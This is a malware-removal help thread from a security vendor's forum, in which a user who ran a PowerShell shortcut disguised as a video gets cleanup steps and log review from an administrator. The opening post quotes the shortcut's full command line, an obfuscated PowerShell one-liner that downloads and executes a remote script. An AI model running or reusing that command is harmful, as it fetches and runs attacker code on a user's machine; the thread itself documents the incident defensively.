Jump to content

I opened a malicious Powershell shortcut


Recommended Posts

I downloaded what I thought was a video file and after I tried to open it twice, I realized it was actually a Powershell shortcut with the following parameters: -Exec bypass -windo 1 $Lti=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal ext $Lti;$wbB=((New-Object Net.WebClient)).DownloadString('http://shortbit.xyz/haku');ext $wbB

 

I immediately ran virus scans on Windows Defender, Malwarebytes and Kaspersky VRT but they didn't catch anything. I checked Event Viewer and it has logged multiple events in Powershell and security within a few seconds of the shortcut being run, so I know it did something or at least tried to do something and I just want to be sure that my computer is safe.

 

I ran the shortcut at 2019-04-10 04:02 and from the FRST.txt I can see that it downloaded a file called rew.exe that is associated with Realtek Semiconductor and has the adobe logo as its icon so its definitely not legit, it seems the anti-virus programs didn't catch it and its still on my system, what should I do with it?

It also created several user permission groups and I have no idea how to get rid of them.

FRST.txt Addition.txt

Link to post
Share on other sites

  • Root Admin

Hello @markb94 and :welcome:

 

Please run the following steps and post back the logs as an attachment when ready.

STEP 01

  • If you're already running Malwarebytes 3 then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • If you don't have Malwarebytes 3 installed yet please download it from here and install it.
  • Once installed then open Malwarebytes and check for updates. Then click on the Scan tab and select Threat Scan and click on Start Scan button.
  • Once the scan is completed click on the Export Summary button and save the file as a Text file to your desktop or other location you can find, and attach that log on your next reply.
  • If Malwarebytes won't run then please skip to the next step and let me know on your next reply.

STEP 02

Please download AdwCleaner by Malwarebytes and save the file to your Desktop.

  • Right-click on the program and select RunAsAdmin.jpg Run as Administrator to start the tool.
  • Accept the Terms of use.
  • Wait until the database is updated.
  • Click Scan Now.
  • When finished, please click Clean & Repair.
  • Your PC should reboot now if any items were found.
  • After reboot, a log file will be opened. Copy its content into your next reply.

 

RESTART THE COMPUTER Before running Step 3

STEP 03
Please download the Farbar Recovery Scan Tool and save it to your desktop.

Note: You need to run the version compatible with your system. You can check here if you're not sure if your computer is 32-bit or 64-bit

  • Double-click to run it. When the tool opens, click Yes to disclaimer.
  • Press the Scan button.
  • It will make a log (FRST.txt) in the same directory the tool is run. Please attach it to your reply.
  • The first time the tool is run, it also makes another log (Addition.txt). If you've, run the tool before you need to place a check mark here.
  • Please attach the Additions.txt log to your reply as well.

 

Thanks

Ron

 

Link to post
Share on other sites

Hi Ron, Thanks for helping me out

After targeting the file with windows defender, it did detect it as a virus and removed it but just to be sure my computer isn't still infected, here are the results from following the steps:

 

# -------------------------------
# Malwarebytes AdwCleaner 7.3.0.0
# -------------------------------
# Build:    04-04-2019
# Database: 2019-04-08.1 (Cloud)
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    04-10-2019
# Duration: 00:00:01
# OS:       Windows 10 Pro
# Cleaned:  9
# Failed:   1


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKCU\Software\csastats

***** [ Chromium (and derivatives) ] *****

Deleted       Amazon Assistant for Chrome

***** [ Chromium URLs ] *****

Deleted       AVG Secure Search
Deleted       Search Here
Deleted       Search The Web (privitize)
Deleted       Search The Web (privitize)
Deleted       Web Search
Deleted       WebSearch
Deleted       banggood.com
Not Deleted   Search Here

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [1650 octets] - [10/04/2019 09:13:25]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########

 

FRST.txt Addition.txt log.txt

Link to post
Share on other sites

  • Root Admin

You look to be running 2 antivirus programs. Bitdefender and Kaspersky - Please choose one and uninstall the other one to prevent conflicts.

Aside from a couple of ADS entries, the computer does not appear to be infected.


AlternateDataStreams: C:\Users\markw\Application Data:00e481b5e22dbe1f649fcddd505d3eb7 [394]
AlternateDataStreams: C:\Users\markw\AppData\Roaming:00e481b5e22dbe1f649fcddd505d3eb7 [394]


I would remove one of the antivirus programs as I said above and reboot. Then update your antivirus that is left and run a scan with it too.

Please note the following from a recent Widnows10 update

Sophos Central Endpoint and SEC: Computers fail/hang on boot after the Microsoft Windows April 9, 2019 update

https://community.sophos.com/kb/en-us/133945

 

 

Link to post
Share on other sites

  • Root Admin

Due to the lack of feedback, this topic is closed to prevent others from posting here.

If you need this topic reopened, please send a Private Message to any one of the moderating team members. Please include a link to this topic with your request.

This applies only to the originator of this topic. Other members who need assistance please start your own topic in a new thread.

Thanks

 

Link to post
Share on other sites

Guest
This topic is now closed to further replies.
  • Recently Browsing   0 members

    • No registered users viewing this page.
Back to top
×
×
  • Create New...

Important Information

This site uses cookies - We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue.